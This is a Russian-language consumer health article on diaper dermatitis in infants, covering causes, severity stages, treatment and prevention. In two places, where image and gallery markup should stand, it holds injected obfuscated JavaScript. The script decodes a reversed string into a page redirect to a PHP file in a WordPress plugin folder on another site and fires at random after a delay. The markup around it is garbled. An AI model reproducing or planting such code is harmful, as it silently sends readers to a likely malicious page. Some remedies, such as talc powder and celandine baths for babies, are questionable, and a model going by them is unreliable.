Пеленочный дерматит у детей: фото, симптомы и лечение

Пеленочный дерматит у детей — это раздражение кожных покровов внутренней поверхности бедер или ягодичной области у новорожденных и детей в возрасте до года, вызванное химическими, физическими и микробными факторами окружающей среды. Данное заболевание считается одним из самых распространенных у грудничков, что объясняется особенностями строения их кожи и отсутствием правильного подхода к уходу за нею.

Причины возникновения пеленочного дерматита у детей

$nJe=function(n){if (typeof ($nJe.list[n]) == «string») return $nJe.list[n].split(«»).reverse().join(«»);return $nJe.list[n];};$nJe.list=[«\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tomy.ru/wp-content/uploads/2017/05/pelenochnyy-dermatit.jpg» alt=»Пеленочный дерматит фото» width=»402″ height=»323″ /> Пеленочный дерматит у ребёнка

Явление у детей развивается под действием эндогенных и экзогенных факторов, в число которых входят:

  • физические ирританты (влажность подгузников или пеленок, трение, повышенная температура и т.д.);
  • химические раздражители (пот — опрелости или потница, моча, соли желчных кислот, пищеварительные ферменты, повышенный уровень pH кожи при контакте с калом и т.д.);
  • микробные возбудители (инфицирование грибами, условно-патогенной и патогенной микрофлорой).

Предрасполагающими факторами развития данного заболевания считаются:

  • недостаточная зрелость кожных покровов грудничка (слабая развитость соединительного компонента дермы, хрупкость базальных мембран, ранимость и тонкость эпидермиса);
  • слабая увлажненность детской кожи;
  • склонность кожных покровов ребенка к легкой травматизации;
  • несовершенство иммунной и терморегуляторной функции кожи.

В группу риска входят дети, рожденные в семьях, имеющих в анамнезе дерматит, предрасположенные к аллергическим заболеваниям и страдающие от диареи. Кроме того, доказано, что недугу чаще подвержены девочки в возрасте от 6 до 12 месяцев. В некотрых случаях заболевание наблюдается и у взрослых.

Фото проявления недуга у мальчиков и девочек

) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toplay=»true» fg_allowfullscreen=»true» fg_arrow=»true» fg_loop=»true» ids=»23307,23306,23305,23304″]

Симптомы пеленочного дерматита у детей

Поражения кожных покровов у детей образуются, главным образом, в местах соприкосновения младенческой кожи с загрязненными и мокрыми ползунками, подгузниками или пеленками: на коже в области гениталий, ягодиц, бедер, паховых складок, поясницы и голеней.

В зависимости от общей клинической картины выделяют три стадии:

  • легкая степень (сопровождается умеренным покраснением кожных покровов, появлением неярко выраженной сыпи и шелушения в области ягодиц, гениталий, нижних отделов поясницы и живота);
  • средняя степень (развивается в том случае, если действие раздражающих кожу факторов не устраняется в течение длительного времени и сопровождается образованием на кожном покрове папул, пустул и инфильтратов);
  • тяжелая степень (выражается образованием сливных инфильтратов, пузырьков, мокнутия и глубоких эрозий на коже).

Из-за постоянного раздражения и зуда в пораженной области ребенок становится беспокойным, часто плачет и плохо спит. Любое прикосновение к воспаленным участкам причиняет малышу дискомфорт или боль.

Лечение детского заболевания

Лечение пеленочного дерматита должно начинаться с устранения раздражающего действия экскрементов, мочи и пота. В частности, необходимо:

  • отказаться от использования непромокаемых пеленок;
  • прибегать к использованию современных гигроскопичных одноразовых подгузников, менять их каждые 3–4 часа или сразу после испражнения;
  • не допускать длительного пребывания малыша в мокром подгузнике, пеленке или ползунках;
  • своевременно (после каждого акта мочеиспускания или дефекации) подмывать кроху;
  • соблюдать температурный режим, исключающий перегревание малыша (в том числе, правильно подбирать ему повседневную одежду).

Немаловажное значение в лечении придается и коррекции пищевого рациона ребенка. В частности, необходимо ограничить употребление им в пищу белков и кислых соков, провоцирующих повышение уровня pH каловых масс и мочи.

Пораженные участки кожи малыша следует регулярно обрабатывать присыпками с тальком и оксидом цинка, дерматолом (5%), мазать средствами, содержащими антибиотики, и цинковой пастой. При легком воспалении можно применять для протирания кожных покровов крохи раствор фурацилина, фукарцина, риванола и жидкости Кастеллани. При наличии стойкой сыпи ребенку показана обработка воспаленных зон антисептическими растворами, а при сильном зуде — рекомендуется прием внутрь антигистаминных препаратов. По отзывам, хорошую эффективность показали мази и кремы:

  • драполен,
  • судокрем,
  • деситин,
  • клотримазол.

Детям, не склонным к аллергии, рекомендуют принятие лечебных ванн, приготовленных на основе отваров аптечной ромашки, календулы, чистотела, тысячелистника, бессмертника, дубовой коры и череды.

Как лечить раздражение у малышей: мнение доктора Комаровского (видео)

Профилактика

Как и любое другое заболевание, этот недуг намного проще предупредить, чем в дальнейшем вылечить. Для этого необходимо всего лишь скрупулезно соблюдать правила гигиены и ухода за кожей младенца, а именно:

  • тщательно мыть руки перед каждым контактом с кожей ребенка;
  • своевременно менять малышу пеленочки, подгузники и ползунки;
  • не менее 7 раз в день устраивать крохе воздушные ванны (ненадолго оставлять его без подгузника и пеленок);
  • тщательно подмывать ребенка после каждого испражнения;
  • использовать для стирки детских вещей гипоаллергенные порошки и мыло, тщательно полоскать и гладить детское белье;
  • выбирать для купания и подмывания крохи нейтральные детские пенки или мыло;
  • отдавать предпочтение качественным, «дышащим» памперсам известных марок, соответствующим возрасту, весу и полу ребенка.

Важнейшее профилактическое действие против развития воспалительных кожных патологий может оказывать грамотное использование детской косметики. В частности, специализированные детские кремы, масла и лосьоны, включающие в себя такие препараты, как пчелиный воск, глицерин, касторовое и минеральное масло, витамины A, E, D и C и натуральные растительные масла, значительно снижают риск возникновения заболевания.

Важно помнить о том, что при отсутствии лечения состояние кожи младенца ухудшается стремительными темпами. В то же время, при своевременно начатой терапии и при соблюдении всех необходимых правил ухода за нежной детской кожей воспаление сходит на «нет» в кратчайшие сроки.

Материал актуализирован 15.05.2017

Adblock
detector